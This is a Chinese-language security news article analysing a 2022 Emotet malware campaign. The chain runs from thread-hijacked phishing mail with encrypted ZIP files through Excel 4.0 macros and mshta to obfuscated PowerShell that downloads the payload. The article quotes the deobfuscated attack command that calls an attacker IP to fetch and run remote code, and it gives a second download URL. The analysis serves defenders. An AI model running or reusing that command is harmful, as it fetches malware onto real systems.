恶意软件Emotet 的新攻击方式
发布时间:2022-03-17 08:09:19 所属栏目:安全 来源:互联网
导读:Emotet 曾经是恶意软件领域的霸主,经常变换攻击模式。在 2021 年年底,研究人员就发现 Emotet 启用了一种新的攻击方法。 攻击通过带有恶意 Excel 文件的鱼叉邮件发起,Excel 文档中包含混淆的 Excel 4.0 宏。激活宏代码后,样本会下载并执行一个 HTML 应
|
Emotet 曾经是恶意软件领域的霸主,经常变换攻击模式。在 2021 年年底,研究人员就发现 Emotet 启用了一种新的攻击方法。 攻击通过带有恶意 Excel 文件的鱼叉邮件发起,Excel 文档中包含混淆的 Excel 4.0 宏。激活宏代码后,样本会下载并执行一个 HTML 应用程序,再下载后续的 PowerShell 脚本以及 Emotet 恶意样本。 Emotet 最早在 2014 年被发现,此后一直保持活跃。2021 年 1 月,执法机构关停了 Emotet 在全球的基础设施。该恶意软件一度销声匿迹,但在 2021 年 11 月 Emotet 正式回归。 Emotet 经常使用线程劫持发起攻击,据此 Emotet 可以在失陷主机的 Emotet 邮件客户端中为正常电子邮件生成伪造回复邮件。 Emotet 自从回归后使用了不同的攻击方法。2021 年 12 月,Emotet 在恶意邮件中携带了下载虚假的 Adobe 应用程序安装包的恶意链接。而在 2022 年,Emotet 转而使用带有恶意附件的电子邮件进行攻击。 有时候,Emotet 使用加密的 ZIP 文件作为附件文件。有时候,直接将 Excel 文件作为附件。 Emotet 发现了一封 2021 年 6 月的电子邮件,在 2022 年 1 月 27 日发送了一封虚假的回复邮件。邮件带有加密的压缩文件,而密码在邮件中提供。 加密的压缩文件中包含一个带有 Excel 4.0 宏的 Excel 文件,并且显著提示用户要启用宏。 宏被启用后,执行 cmd.exe运行 mshta.ext。利用十六进制和字符混淆来绕过静态检测措施,去混淆后为 cmd /c mshta hxxp://91.240.118.168/se/s.html。 HTML 文件是高度混淆的,执行会下载额外的 PowerShell 代码。 混淆的 PowerShell 脚本通过 hxxp://91.240.118.168/se/s.png下载拉取 Emotet 的第二个 PowerShell 脚本。 第二个 PowerShell 脚本中包含 14 个 URL,脚本会尝试每个 URL 来下载 Emotet 恶意样本。部署多个 URL 使得攻击基础设施的弹性更好。 攻击链的最后,通过 DLL 加密资源段加载 Emotet 执行。 结论 Emotet 是一个高度活跃的家族,为了逃避检测会经常变换打法。最新的攻击链显示,Emotet 会综合使用多种类型的文件和高度混淆的脚本发起攻击。 (编辑:应用网_丽江站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
浙公网安备 33038102330468号